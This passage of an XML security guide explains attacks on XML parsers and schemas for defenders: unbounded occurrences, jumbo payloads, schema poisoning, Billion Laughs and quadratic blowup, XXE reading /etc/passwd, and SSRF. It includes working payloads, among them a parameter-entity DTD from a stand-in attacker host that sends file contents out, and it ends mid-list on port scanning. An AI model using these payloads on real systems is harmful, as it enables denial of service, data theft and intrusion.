Not defining a maximum number of occurrences can have serious consequences when the application receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to remotely read files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, it must contain a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
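&lt;br /&gt;
A deployment check for this condition could look like the following sketch. It assumes POSIX permissions, and the helper name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; and the temporary stand-in file are hypothetical:&lt;br /&gt;

```python
import os
import stat
import tempfile


def is_world_writable(path):
    """Return True when users outside the owner and group can write to path."""
    mode = os.stat(path).st_mode
    # stat.filemode() renders the mode like `ls -l`, for example '-rw-rw-rw-';
    # index 8 is the write bit for "others".
    return stat.filemode(mode)[8] == 'w'


# Demonstration on a temporary stand-in for note.dtd (POSIX permissions assumed).
with tempfile.TemporaryDirectory() as workdir:
    dtd_path = os.path.join(workdir, 'note.dtd')
    with open(dtd_path, 'w') as handle:
        handle.write('placeholder schema contents')
    os.chmod(dtd_path, 0o666)
    print(is_world_writable(dtd_path))   # True on POSIX systems
    os.chmod(dtd_path, 0o644)
    print(is_world_writable(dtd_path))   # False on POSIX systems
```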
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker in a position to intercept the connection could sniff the traffic and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined as a reference to entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
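&lt;br /&gt;
The asymmetry between what the attacker sends and what the parser must hold can be estimated with a few lines of arithmetic. This is a rough sketch that ignores the surrounding markup; the function name &amp;lt;tt&amp;gt;quadratic_blowup_size&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
def quadratic_blowup_size(entity_length, references):
    """Characters produced when one entity is referenced many times."""
    return entity_length * references


entity_length = 100_000   # characters in the value of entity A
references = 100_000      # number of references to A in the document body

expanded = quadratic_blowup_size(entity_length, references)
# Each reference is three characters long (ampersand, name, semicolon),
# so the document that travels over the network stays small.
sent = entity_length + 3 * references

print(expanded)            # 10000000000
print(sent)                # 400000
print(expanded // sent)    # 25000
```

Under these assumptions, a document of roughly 400,000 characters expands to about 25,000 times its own size.&lt;br /&gt;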
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to ten references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;, each of which expands to ten references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, roughly 3*10^9 (3,000,000,000) characters, which could make the parser crash. &lt;br /&gt;
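&lt;br /&gt;
The size of the expansion follows directly from the fan-out of ten references per level across nine levels. A minimal sketch of that calculation, using a hypothetical helper named &amp;lt;tt&amp;gt;billion_laughs_size&amp;lt;/tt&amp;gt;:&lt;br /&gt;

```python
def billion_laughs_size(base='LOL', fan_out=10, levels=9):
    """Return (copies, characters) produced by expanding the top-level entity."""
    copies = fan_out ** levels
    return copies, copies * len(base)


copies, characters = billion_laughs_size()
print(copies)       # 1000000000
print(characters)   # 3000000000
```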
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt; &lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, or to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario: with complete disclosure, you can clearly see what is going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
